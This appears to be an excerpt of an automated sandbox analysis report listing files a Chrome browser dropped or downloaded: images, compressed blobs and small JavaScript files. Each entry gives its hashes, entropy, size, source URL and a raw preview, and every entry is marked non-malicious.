                                          SSDEEP:48:h/w1CTdaTVnDdnbRAc7xcec4iTjgM7kx1aazlcLdzfVLbsSVzr4ROSdtKvZR1D6x:hcadahndvmeczwBWLdz9LbsSVzrxfzK
                                          MD5:CD5FEACBF2A020D90E4B82E0DC15129C
                                          SHA1:EA3B6E245B290A40D3A550CB5B8D02EEB7152D59
                                          SHA-256:DD6E994E2EAFC16F487BCCC7D8E6C9E8825763D8D11FC714B5710DAA7C15AB9F
                                          SHA-512:D41AFE93BE97DD00FAFE3E022E1289A287C344A2B123E6B655963F87497241AE18EB57CB8F1576679314431FE9EF906EC57EF1207C6CD64D9634EC448C621596
                                          Malicious:false
                                          Reputation:low
                                          Preview:/** ..* ..* Base64 encode / decode ..* ....UTF-8....Base64....* ..*/ .. ..function Base64() { .. .. // private property .. _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; .. .. // public method for encoding .. this.encode = function (input) { .. var output=new Array();.. var chr1, chr2, chr3;.. var enc1, enc2, enc3, enc4; .. var i = 0; .. input = _utf8_encode(input); .. .. while (i < input.length) .. { .. chr1 = input[i++];.. chr2 = input[i++];.. chr3 = input[i++];.. .. enc1 = chr1 >> 2; .. enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); .. enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); .. enc4 = chr3 & 63; .. if (isNaN(chr2)) { .. enc3 = enc4 = 64; .. } else if (isNaN(chr3)) { .. enc4 = 64; ..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):6379
                                          Entropy (8bit):7.945124258614392
                                          Encrypted:false
                                          SSDEEP:192:JYpCfXM/cHur2CY9hFx/40ynVl2WGw3/X:JVMd2Csl400UCX
                                          MD5:6498A9D97304B0B805C98ABBDA8ED0FC
                                          SHA1:EBBC775BAFBCB958B3E4111A08AA30A8EE04500C
                                          SHA-256:07BF983F17C6B63C74E12BC837F87A19F4656B6D901F91AFF0646A0AD1390245
                                          SHA-512:497FFEA39EB48825137988609B8204258C8F41362368D7574217C664D77596EAAE0DDF8BC0B9400EC90E7CDCA368ACBA65CE311883A10196BDD983A37342A228
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR..............2.....|PLTE....%N.%N.%N.%N.%N.%N.%N.%N.%N.%N1...%N.%N-...%N.%N.%N.%N'..0...%N.%N5.....K..8..&..-..5..D..p..@..1.."...%N$...%NO...%N...`...%NF..0..*..!i.*..)..$w. ^.$...%N6..j..e..5..9.. a.J.. ..1..:..*..f..*..#k.6.."..E..!e.=..!..`../..#..1..N..`.. f."..^..Y..+.. d. _....+.. `."i. ..6..$o.>..6.."j.:..J..7..N..&..1......%N7.....l..*..8.....6..!c....&y.3..)}.E.. ].%..C..7..@..+...%N ...]....!b.-..............4.....;.. ..;..*.....e..=..9..'..#o.5..,..)..4.....6.."..+..&.....'v.O.....F..V..)}.J..>../........B..,..7..(..*..8..... ..9.."j.8..5..!g.)..3..$..2..$..%..\..A..,../..2..#..0.....:..7..:..*.....;..4..5..=..!..)..;.. }."...v.?..O..G..B....`-...{tRNS..?...#.....\i9.....Iu.b"*'.S...y.h.f.CD63...OG2.U..J......|nd..}S...n..T$.......@.....`............o...........u....IDATx...1.. ....8`.@. .....wMR..........I.W.......8..=....!......U.....P.`u..N.9...f...?..D.k....'.\.'......Y......$.Vo0.v..t`.._.i.........s.6y.vC'...-\!..~}G.....p.Z'
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 117 x 38
                                          Category:dropped
                                          Size (bytes):705
                                          Entropy (8bit):7.614732037202285
                                          Encrypted:false
                                          SSDEEP:12:kL6+GTakDEkU1ALF40oPoFh5CIusEsgFkPvXP1qpWMda09LttyOpMYiodJBtBIW:kL6+eaBahyPm5CIudYfYpWMI09L63+GW
                                          MD5:803BB46A6ACEF395ED9353DE2DCF26F5
                                          SHA1:684764E45EBB267A15C337A6EB671047C7873EAD
                                          SHA-256:DC506B4253E2BB145E5B370F6088842382A8C2BD0632D9B265744F706727F7F5
                                          SHA-512:C4A0592062B3AE535213A51CCEE72989F9D33B887BA8374A2778DC0799F92CE4076AA6000E4F8F40F97E66B8EBD1AAD6392C0D8A291E79D6ED04D1796FEE132C
                                          Malicious:false
                                          Reputation:low
                                          Preview:GIF89au.&.....2/...Y`...vt)2.......!.......,....u.&....x...0. J.0...`.UV!L...l..P....V..|.....4...H..(...........t{....,w.|..B.Z.a.K.7|M.Ph..%....n8FN&:@F..|V1~w.y....r.. .9.khlO.j.!.s.\...m..&.\...AZ.PQ..~...yX..R.............WE.z85.'...............D.a...........,...L......&..P..<.T..H...g.t..gj..4.. ....O1..>*HF%.$...i2@..L...\.N.$..(.'&3g..9(.r...9..D.,i.q+l.;)4. 0.06`Z.fW."U.M...Ni..jC...X..x..m.............eK..........n..BC[.. `........_.:&.`.S........../m..Y..... .a....~.....0.....p.!..i..6..f...y\<..{.f.[t..O'.S.A... .\L......`.....m.T52.D]P..U.a.}..H.=..~.Ux.m.d....e..Z$..#.r0!~.*..W+...v.#.U.a..mf=..*L...<0.3..]..x...\y..2....).J.h..iH.t.....HK&......D.K.....;
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (3347), with no line terminators
                                          Category:downloaded
                                          Size (bytes):3347
                                          Entropy (8bit):5.179155367420231
                                          Encrypted:false
                                          SSDEEP:96:pIjmgaIUP0enqqsJxRDd4do6skj79o5kX2:pIigaIDqsJxRDd4do6sU790kX2
                                          MD5:AC15AE6CB84A28F7C6A21D9BA34799FD
                                          SHA1:E3A576CD862B5CD018C18F62FD9E5023B2C06D73
                                          SHA-256:17A5BCC92FC623EA30802FC2325397D4F4533193CB8FFB13766ACB8A726E78FE
                                          SHA-512:5FD32A09FB9DC8AACEA1296E6B1C48C326B73C95EDF47186A026658964367AF368B9029C25534C4D76E3E76D1197040F9BCA81AB88D8A664CACABF0AE504AD06
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/system/resource/js/vsbscreen.min.js
                                          Preview:var _vsb_multiscreen;if(typeof(_vsb_multiscreen)=="undefined"){var _vsb_multiscreen=new function(){var d=this;var a="vsb_screen_set_device";var k="vsb_screen_reload_count";var b=300;var g=2;var h="vsb_screen_reload_url";var i=30;var e="_vsbscreen";var c="devices";var f="pc";var j={"useragent":{"browsers":"","mobilebrowsers":{"device":[{"name":"KindleFire","typeName":"pad","content":"(KFAPWI|KFTHWI)"},{"name":"PlayBook","typeName":"pad","content":"RIM Tablet"},{"name":"iPad","typeName":"pad","content":"iPad"},{"name":"NexusPad","typeName":"pad","content":"Nexus ([7-9]|1[0-2])"},{"name":"Xoom","typeName":"pad","content":"Xoom"},{"name":"GalaxyTab","typeName":"pad","content":"SCH-I800"},{"name":"MiPad","typeName":"pad","content":"MI PAD"},{"name":"SamsungPAD","typeName":"pad","content":"(SAMSUNG SM|SM-T)"},{"name":"iPhone","typeName":"mobile","content":"iPhone"},{"name":"iPod","typeName":"mobile","content":"iPod"},{"name":"Android","typeName":"mobile","content":"Android"},{"name":"UCMobil
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):9191
                                          Entropy (8bit):4.868119607746248
                                          Encrypted:false
                                          SSDEEP:192:EGHPJXYZU02g2VP3k63CHrmYAZktQFFZXOXVBRaaZDFCEU30tk0BNBJhJvdM:EsZBNoU+lBRaiDFsIM
                                          MD5:F51AF6C6420DADB5056C6005D2FB58C6
                                          SHA1:F111BE58604AAFC5B5084F171197053D58CF1EB4
                                          SHA-256:783D1B4C058E515073ACF227740D59D5240E9A554ED09E467E9AA9E417EE853F
                                          SHA-512:1705CA830146234F095BD88CEA2E091584588BFB07A7E4B5F7EC30DF77DC374364A1F452B70D2E3F03686E639816888F4CFE1ABD94C844DD0AEE7C21B01DE027
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/system/resource/js/calendar/simple.js
                                          Preview:function Simple_Calendar()..{.. var cal_CalendarCalendarData=new Array(20); .. var cal_Calendarmadd=new Array(12); .. var cal_CalendarTheDate=new Date(); .. var cal_CalendartgString=".........."; .. var cal_CalendardzString="............"; .. var cal_CalendarnumString=".........."; .. var cal_CalendarmonString="............"; .. var cal_CalendarweekString="......."; .. var cal_CalendarcYear; .. var cal_CalendarcMonth; .. var cal_CalendarcDay; .. var cal_CalendarcHour; .. var cal_CalendarcDateString; .. var cal_CalendarDateString;.. var cal_CalendarWeekDayString; .. .. var CnYear;.. var shortCnMonth="";.. var yearString;.. var monthString;.. var dayString;.. var weekString; .. var Browser=navigator.appName; .
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 2088
                                          Category:dropped
                                          Size (bytes):797
                                          Entropy (8bit):7.76373736359512
                                          Encrypted:false
                                          SSDEEP:24:Xh54rz6dA/utp99m/R1M1//ZhJjF2+NqunH:XSz6dhp9Us1/RbNqsH
                                          MD5:1BE1D6290006E67BCB2FACDFA571A4D1
                                          SHA1:F5AE95AB95254A0834B9155E3594EF814F8C6837
                                          SHA-256:02CB7CDD1B17375D306F6A4E3A16BA8B064166FCEFFD4BD45AF5ADC0AE37E894
                                          SHA-512:4A90CEBC7FDACB4B92222F6A359761E99A14D8A7302747A3A3825EBDBECEBF0D9F20FBFC72560EF99FA4E5CDFD63120F544CEC9DB0BAC2DC03CC8D9413487227
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........V[O.@.~.......51.a.Q./..&..1d...-...KH.E..........`..5&.e.7..'..3...>..y..9....o.[q......T...=K.e......&1... X.8@MQ.fVG...Cy..*I.Q....!..<..&.t{N. .....9...a...T.b..................}I..v...2.f.....{..W...}.......o../.....s.x.l~..o.....U.......{.L.O.a.u.:l*K.wR;.da.9A...8,...#K.2...c#......if....<g@..y..E"......@T..T..9.1-....,........a..b.....j...p."M.3r........?....o...r.?Z..a.e+...z..U.W.%.....A:.1z..b@U.lx9...E1.:.k%..M.a....4..}E....Qq,.Ft. .kc. ...d...Q..UD.l.......itDmG.i....XZ6|zD....Z..H.R..pm..........B.J.Z.......W..u...&...,..ZR...O#..N...]e...F...%..oo....O.u...........P.T9#5hP.W.x."vh.M.sC*.......A8...+......+....[.o..L.L.....F7.z.&..~.G......BmQ]5...O....F..kk...crj.....F.7l.0..5.L.I....[R...:j.........p_.q.(<.....F!2(...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 560 x 82, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):60109
                                          Entropy (8bit):7.944071406207154
                                          Encrypted:false
                                          SSDEEP:1536:e3jgDcKyxLkr6REo6aCZkgP/DOB9CRzWVZLHujOf:Sj9/grSEHZR3D09CmxOje
                                          MD5:C70F5C2BFA7CF697A0FF52C53E8CDECA
                                          SHA1:DBA8C3BF1A9910EF44457BD8EBA520242BCAE3B6
                                          SHA-256:056B11710BF843A85DF22FCFA2326AAC1494554C4B9A34FA9C667BD5689B9736
                                          SHA-512:79697EA8CF608CBC78BD01DF46DFABEC85DA9CCB6ECA55A3A4A347134C69660F58EA589B61C25DE47B34676AC3E40DD43148D3A5FB5804025B1E807996231CE2
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/images/logo-xxgcxy.jpg
                                          Preview:.PNG........IHDR...0...R.....JR......sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x...xprVWx..Mh.A..g3il..f.....+....(h.A.......QA.A*^<..hPW...Z.H.bCMi....DE.".......73~..A..Q......;K.%..|.$!.Zq..ck..MM..[..e..%...MW.~.....JYt0Vx+{z&..;o.n.T........\Evw..#se.../....jCC.do.#9<.jZ....o....Zk....|O..~.Zz....Le......c.e..1._..8..e'..%C.B.C9U.......|n......1y..KY..N....8.(...4e7..r.r...+.....Q....N...]9....F?Y.......@..;z..$....4....4u.c...b?...fD........X....Gu..`.6..0.a.......g..........(.'i.z.....i..PK.mA.Y...O...c.#i..>..{.k.0.C.?.................8.M.}.~.Y.......j...../...i..nm(..2.}q&.?....[f2. .N.m-L......_...+...\K.s..6.._^.#.....................ON.Q...]...5?..A................~.2AX~.Wu....HmkBF........................................................................).3.....mkTSx..]M.$GVN.=..?{e..4B.8x..U.a....nOuuMe...]...*gj.3m..w.H.V.......E.G....iO..H.@B..a/.9..x.EdVfVdUfv.t.9mwdfdFF|./......Q.]......9....a.J.=hT...>f
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 1092 x 720, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):103738
                                          Entropy (8bit):7.953096936376712
                                          Encrypted:false
                                          SSDEEP:1536:2OUm/OAsVxwc2a+N92Nvxm4YxsmhzsKnJkmlP8MoSG+cGm3rZMM8a8QjtUotUTga:2CpU7m7OEnq80d5ZCQjtB92Jq38Tzl
                                          MD5:FE21BC54B27A9F17051B8B20272B84ED
                                          SHA1:B8F46EFF9DB9C7DDA22E84C6068217F5E5CFC19C
                                          SHA-256:92BFAD1534C35E59192341700DD98B1FA3783085842A4E56F1EF6EF7C52B15A1
                                          SHA-512:FD9183A940A4115C4937786CAE5AF64C115FC70537C46B58DF7001241DD3C9A4DE2101167A8055032EA132CF8A2ED0CE79AF5A3D275F975A4CE5B1518E430CE4
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR...D............L....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.......{.s..<.4.(. .. $c!l!. ...w.......g...2...}.........8..e.o..$c...D.B(..&......W]SS...'u..v}f...v..r.9.{.R2.d..........z............z............t..T.I.T..H...&.C>..h.K..A.9..6.0.........*.........Ur[E.$.6...Q..T].T........-.m[.O.....c..(.<.l....].J(.....'K.!. ....... .Q....*..`.......5R...L;S4..g....G.......h.DDf.U..E..K...P.v.X....gTIDq.... .V...b.._>|.F....f.K..4....".U....T....~.....G..{Fn.,..w........1Z>.Z..X.9#... F..T...........z.I....-..l.M...B.V...8.L..kH.......m.0....s4.V.......K........e4....Sf.q.2S..A!P...Q. .%..@...?h.D.N.p.2'..oz,.... {...C...>.L..dLf.g......t..<S...../....b1..>Sw&...#_.+..5..$.....Y(.J.p8.x0.K>!....$....1...Cq>.."u.......*Xzr...3d......L1....e.k:..T."Q<:..r..,...B..X..e.. "..G.X.2.`0.W..m.....j...?....~Z.H..y../.....3........Z.?.V.....^}..%K.O..?.c.M_.RWuUU"..*B.C........g.......=T.hMp.eS.Wf..A.Q.........{...<.{L.......9.U%p.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 7899
                                          Category:dropped
                                          Size (bytes):1404
                                          Entropy (8bit):7.832290418196049
                                          Encrypted:false
                                          SSDEEP:24:XpgFNEV4e+6WspJq030nnipPzMwCpfPWDyWlOzLFofXvSqwXMdCs4g/OX:XmFNEVFWs/q031xAwCNWGJLFonSCw3X
                                          MD5:8ED7F53E3C4D7AFBBE4CDDCDFF920262
                                          SHA1:9F7D5D268200DC26F4A658CFB135A51A98061780
                                          SHA-256:78555A142760655FC81FFB96CEEBE5F57E24B0FA94A34B009145C364971AEE0A
                                          SHA-512:5A29AB343B44CE11375B18745E413D352582F10F9FEFD1BE6238D2738059821B60C986E8E81995A6688F23D64C779B18873BA211E174E4DD7B3B8568510C0657
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........Ymo.6..-.......:....dk..qS...Zb$.4..T.;.....%..#c....{...y.H9.R.....<K.8.b.W.9....!.QB....$....W.....K.a1~.D.........O..u.........gg.pvO....+TW+.m.|..'2.+.'...<_.}..P...m(....(..i.5...........N.cG?}.p..N.Sg4.+!S.....W5gTK. .#g.%.0..41...S!..=...#.a.$V..6[....DI........lN_...g.Y..)V..h_K....|BI2.(....D........T......._...(.Dd..9..!.9.:q)G!N..%>......?'<.b....3.r4-...!#.c.o.HCV.B.P..$P.}..\. ..7..e......Bi..\.JaR..I...e.[...k....VX....l..T.-.`v...A.3" .[....nK..E.gd...&..8.T.mlp.....I.d.3...n..S..;..O...N..p'?/G...X.0,$.S..L.l...Q.^9.....*..z5.C...V..QzP*o...!mn.n*..M]......W..2.....5|tgS...W&.....lRO....;.....Ii'..h..|...(.>.cml...1..'.K..l.....QD....{l...g.m`....I.....`.3...E8)..E8!....Xg.:ji.3o.....].....K8.}....SU....W.....q.....98&..hY<K...O.A.y.s.....N...0sg.N..f.Wj]..Cu.=l@..h...+;#........2.....-.{ycg..<..G.~.5....-...g;#....IH...Z..bD.{qfg..<.....=y..<..D....R..X..p?}..s....hr..hr..c1..{vng........^.p?9..[....i|.R....$I.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):20
                                          Entropy (8bit):3.921928094887362
                                          Encrypted:false
                                          SSDEEP:3:U/QavKn:U/pvK
                                          MD5:311749C1D5F9BCF240CA9C25EAE61F47
                                          SHA1:29703F0938CAB5945DB52E553F3F22CBD7F0B478
                                          SHA-256:183F83B69B6F7CED023F06BC9B98B2D00C9E08B5C627C1F6E9002F48F0BBFB5C
                                          SHA-512:8C73C70FB0FA61E164858F728A7EB86B093139964CC7E51DDDC145578FEC35B68AB3271ED5106A50BD97873494D0BA0272A9457006CA23A689E5CB82B0C30B7D
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/sitegray/sitegray_d.css
                                          Preview:/*.nograyforsite{}*/
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1200x376, components 3
                                          Category:dropped
                                          Size (bytes):274578
                                          Entropy (8bit):7.972269201317617
                                          Encrypted:false
                                          SSDEEP:6144:MNGwbjlVFPbsW0XEv7mjRmvtaAXztl5OJlvENbbpiHLHmZxfrnCEQ:MNLhNmjR9AFKl+b2HmHuEQ
                                          MD5:9C328E2D11DBF504567BA31B7D9F92E1
                                          SHA1:C5A366C5830FF0C681666C898CD610041286E376
                                          SHA-256:E3C3FE56D1C0D8531F03929E8450C0CC1208EDF0DF4E38AEC6F02E7C843B9CA5
                                          SHA-512:5C88EF89ECEE8128E77D430E029012B729D56746F527CD9990C59D85A6361FFE6723D979461A95F2E02EB08554FC3E81D44E1180FD921B470AF341A21CA7C312
                                          Malicious:false
                                          Reputation:low
                                          Preview:......JFIF.....H.H.....C....................................................................C.......................................................................x...............................................Q..........................!.1.."A.2Qa.#Bq.R..$3..b..%4CSr.......&D.cs....57.Td..................................A........................!1..AQ"aq.2.........#BR..3b.r$CS..4................?..1.Gqd......o.8.r.>./E.Kj..._..3.1Z..Jo..s..3....5&k+.SR..(...yJ.+D..q....;T..K0..TZ<n........&.m...5.n.KW..".)./e..ZB..e..I..S..k?..E....d+B..~x.......I.~.....We+/I....&...F(J.=...09j..u_}B`.j.c....\....-.^XU....mG*y........D.T. `....Y.7).{...k..(nS..L......b.Q.0..N...........|k....J....s....k..1.D."F_6y.V6&;u....N..k.... .%G..W.z......7.k...P...>...u^x......~...M4e.....j.sSmCscyn\bO..F....u".1.Z@ET.?][.w.!.!&.@^.?E.1.!.....<..p.b.c..;....e..$O..1A,....I0H..t..j..TT..]...M...ye....j.5l("h..S:.IJ.#.y".68...]+..=...@....>..U.....E..zD...+1.=....L=Z.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 6959
                                          Category:downloaded
                                          Size (bytes):1929
                                          Entropy (8bit):7.896147866550147
                                          Encrypted:false
                                          SSDEEP:48:XfrAemjEULMiznaTzg5q7zGNY6o/6UGTi4N8R:PkrQiO6gGNLo/kh0
                                          MD5:8B4E801D5503887441BD73CF271E664E
                                          SHA1:A46E84FC4FC0F786DFCCB475AEDBAE067CCA84BC
                                          SHA-256:2037542592A6F0B6B63E3CB1151DD3BC9F9906FE4304A8FDFFE2332F19FB14BC
                                          SHA-512:738C5E31A7DA66C06F1B06408E89E8B9835A4B4DDB2526A85CFBD57E47F40B79B60E92E6F0DF89748D0439830AF28C2161AB6548F4A4903BFB910AABAE1B11E0
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/js/float.js
                                          Preview:...........Y[o.G.~..R.wa.8T.RLZ.*..U......=N..w..u.D#E".....($..%...........E.....z..H....9..\..w.....!.m...BB..|..+R|])_E.>..w(%2.#x\...!.W..D.v..U]..1M.....G....]..?(YL.K..e.y6M..KOH9..{eh..O..'.t.Qu...X..K7&.io..dN.b..........@...v..hT6.Va..V.4..Ed...2G./U.<..hT=s...&:\....{.P.9.zk..Q......IL..S..L.]...#..!....h.u..+...g.....OW.oT..F._..}..Y.w..K.c....n......H..P..H..J...6..b.....=...5yT...'......f.C.XMfLS....M.*......Z.pB.....%.:K..a?X'[...%......S..6..&...e........."....5.F..(..G.'[F..5...M.^J.5..tC...A...7..>..B..D....f..J400....?..}..|."...\x-....hab.facTV.. ...Y..$3....E.....L.......e....[.kO`..L..I58..,.....Ux........U2..*}4}...*gb.Bpa.2.......-K.c...#...t.O..7...`On...O7.Y.P`.....#.UY.. Q..4.X.m..9..<.......0.y3.A#%."J".?..K.....rJ.bN.o..?.wL.Z.>..4.Z'.w..s.u..... ..F..}...a.A.kz$.>......t.....%....[Sw....M..3..t....%.2..8>..y.s.}..90u.=O......_Lq.y8..q..V..PN...5E^.X...nV7o.K.M...Z.....s..sZ+./...SyS.N...8E....n.4..m.3
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 83430
                                          Category:downloaded
                                          Size (bytes):17137
                                          Entropy (8bit):7.986546005781596
                                          Encrypted:false
                                          SSDEEP:384:Yez+talDrWqXA4eGEZSuXiNFwwP7NhQyVHmZ0bhCM98VDRrLux7:nSICqXh4ZiQSHXhCW8zXuZ
                                          MD5:3E834766DAED6468525C7D2CAE02AAFA
                                          SHA1:34C2821F523D48C32CBC6457EABCF6DBA6F844EE
                                          SHA-256:AC2DE66122285A69DDE8AD46571D6D94179ED07E6B06A84928AE87128B5931B0
                                          SHA-512:2663E38C08EF282737BCB3CAA404F8A13366AE0084B810FB2FC10D73CBB316D280283EB15F8EA364A9E728BECAE481E27A3612413FF7F5F0A534C9656155663D
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/themes/gui-base.css
                                          Preview:...........}y...u....P3..!......N...#,.^Q.........A.%...;..Z".....:..|-....&EJ.2.._....y.D.{d.v..U..|../..g........G[.Bq.;...U.s..?...?..o]....p..*-r/...9.x~_o...{.Fg('!......I.JQ.~0.....g?.........~....r...I.G..(ko_fwN6E.^F. .........[.......y...8...i?..Q.$..s..../^..W...W..(.Q.....;..B.....n.mv.*...ivyZEy.P....m..E.0.~.........\....~Z..e.\^m.r...!*.4.P/.....TGiV.V.:.v5.-../QoU.5*{..%..6J.....^...*.Sh..b..WIZ..N.Y..?D.$-zq..EUoW...UU..gWHd.gi..4..+...e},.u~..'...i^.w^..H.".^.+I.E.....75..K.4IP.r.F[.]#.w...Q|.]..<..E.M...hwQ.....F.DgX*........x_..|..{.}]..U..._...a...$]......W..../....../..QrX.*.~.f.=gL/.,9$...V.e.N... >l...uy...B.o0........J.N.X...+.....*lg.Bc...c6.;%t:~rA. ...UJT{Z",D,..r........m..+^n....t........F...........4.F.+H.E......x..?Tgkj..%..WDM..8?e.?0..v.`)....aSb..Hq.|}J....k.1..N&....1.w..`.E.*..*.-...N.z...h...>0...S.j....6..8=RK..EWL_i.......Y]......*]fH..H^.O.z.].3y. ....T_..s',......(..0..m....{.v;..Lb..Jd.....aWP..,_.5/.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 33266
                                          Category:downloaded
                                          Size (bytes):9892
                                          Entropy (8bit):7.972508432424258
                                          Encrypted:false
                                          SSDEEP:192:qlehYXevG1OuZAPpHaU3WabIgwkhTiROULU+YODxuc4T8VsS5o9sAPPj5KO:JhGevKOyAP59byE+ROULU+YAp44sJ9sY
                                          MD5:663F03599096BCF1699EF7D93FA0540D
                                          SHA1:DDD8375E5C1E2F58E9E0C80A7A58BECCA0EF4993
                                          SHA-256:2C414450E603199DF8F068A30C5C445DED725BB7C9EB13DF3FD20051E0CD8672
                                          SHA-512:63C812CA5A66943611F522A9ADB73D9F66D022C0126F9E066CF72EE19F2765AE65F1CEC1A8E2B8FCF4C5F06F76805B68699C35DBA138D1C1F4BEF39706ED9784
                                          Malicious:false
                                          Reputation:low
                                          URL:https://551000l.cc/message_zh_CN.js?v=1736150851437
                                          Preview:...........=kSS...W(.].......:c.=.L..}....T*...:$1'.\.[...@@QDA....Pi......9I>..f....g.W........^k....\.f.t.........dG$.M..o.X....R...............CK8.Bk1W&.-kd..{...?5..5..+....d....K.v..R[._)N...>.5.W...Va.|=[}...4.=...$R...qg.>..>.e.......Ao......W.PF..............S.....S.n=.m,..........._..C..Ju.I-.smn..x..K.B....OS.(..s.G.....m..uk._3....#....S...'..|:`....r..Mv......x....V./l................|.\yH.<.j-,.v..J..VLS.e...>un=.H.u../.....`i......a..xm...._.....CKw.f..U.v!..28m.\yS....V.aDc...x...!.N'zC.x:.5.=k..).R.\..V..f..}.`.l.\*.-.....d.[..@.f.v..0g....I.F.G.xf......f~..[.....W..9....x.x..Z.yW_.2..a....=..Z.....5......z&..@x.<6.Ek..z..$z..=3.....&...g4'.a.=p"ep8TJyk.I}y.,=m....Z<....>.+.@[~PH.o....6...&...h.............8?p....5.6...V.....=.Y..}..'...gW..8...+....mA..Lc..)G..x2nt).!.V.w..'.........oM..ry4...,..p4.I..h&+[.N...v..*.';..+.T.C.%.BC..Z.....S:....D..G.st.h.R...z.^i.K......d-..@.!?p .0p..F.k.`.uL.M$.1....A...n}8
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1200x376, components 3
                                          Category:dropped
                                          Size (bytes):333374
                                          Entropy (8bit):7.979357166765808
                                          Encrypted:false
                                          SSDEEP:6144:Eq+cpjoXXG2Ja+8zp9ULM/EWRchd3GEqZZme3TocOayvDxcpgeleqrMctEbIPvCp:jfomOs9UrWRYVGYe3T1yS1lDrdE8vIN
                                          MD5:94C27B7C4E6860EF166578E96DC750B2
                                          SHA1:7E87EAB31DC751541D7C021BC226D7F20D9EC912
                                          SHA-256:41E08C5BF5654F0ED5D02CCDFB6CFB8C633E6FAA7322E112A6989DB237AD3C10
                                          SHA-512:3BDF2026E06C00823F40E78399C79A938F589A922065071E13B0B2D2AAE40C5594352CD3130790DD0F81CFABC88DFBC8ECC3B1B2DEF6B7367150E6E37DA6DB86
                                          Malicious:false
                                          Reputation:low
                                          Preview:......JFIF.....H.H.....C....................................................................C.......................................................................x...............................................V............................!."1A.#2Q.aq.$3B..R..%Cbr..4S..&c......Ds....5T....d.....................................H.........................!1AQ.."aq..2......#BR..b..3r$..C.....4%Scs.D.............?..~ ..Y..8........x7..5.....n6*...hJ....T^>j...u>I..o...v...uUO.."_$...yYy.Z+{.._.P..Hc.....5..l.T.EO..d.P........n7..!i0...0'......Z...}.A.........O.w.po.....cylm..;...Hf0.J..J.Jt..k.{.mQ....*>.......-./.3....u`.+]AR..U..g...}..^.........Q5E.... .. ....Y...s.\...K1...hb.Pz*..y..4I.Jyz..{...O...;......6=.....X..B...$slj.....M.O..[O:J....)."..Gvy.i&..{/....*.b....op<..E^e.d...,rue_.B.O;..oCkW.J...<.R.N.b)....U.^,....hF.5..)...f!W...G.....7*.Z...qK.f..PB..7..'.[Q`....I.]D.m...D..E$.|v....d....E.D.......|.6.I2......0..z...}v....ih...&......
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 3593x1400, components 3
                                          Category:downloaded
                                          Size (bytes):296412
                                          Entropy (8bit):7.931124631952406
                                          Encrypted:false
                                          SSDEEP:6144:jsw/ojc+qPxyYKTsbcGPp5iD8PRCb2otJdY0b0raG0idjHlaDfBW:pQjc+qPlxS8PREFtEnDblIo
                                          MD5:ACC29E2A810DBB1885ED42BCCFCC3DDF
                                          SHA1:16175006F7ECBE64FEC2BF622188680E9620E525
                                          SHA-256:40A9EF15524032293E0F19486DD17456585762F1FCE3BA47349CB2E79E2D56E5
                                          SHA-512:32FF9CFCE71411FF45F847F19D4F21111E4DB8A058D9440DE2483D3F228C033C3D5AE14AF05A45DB93E1BF1D017B479D74F989E8A11AAE3F3E72BF5DEE87988A
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/imgs/bg.lanse.jpg
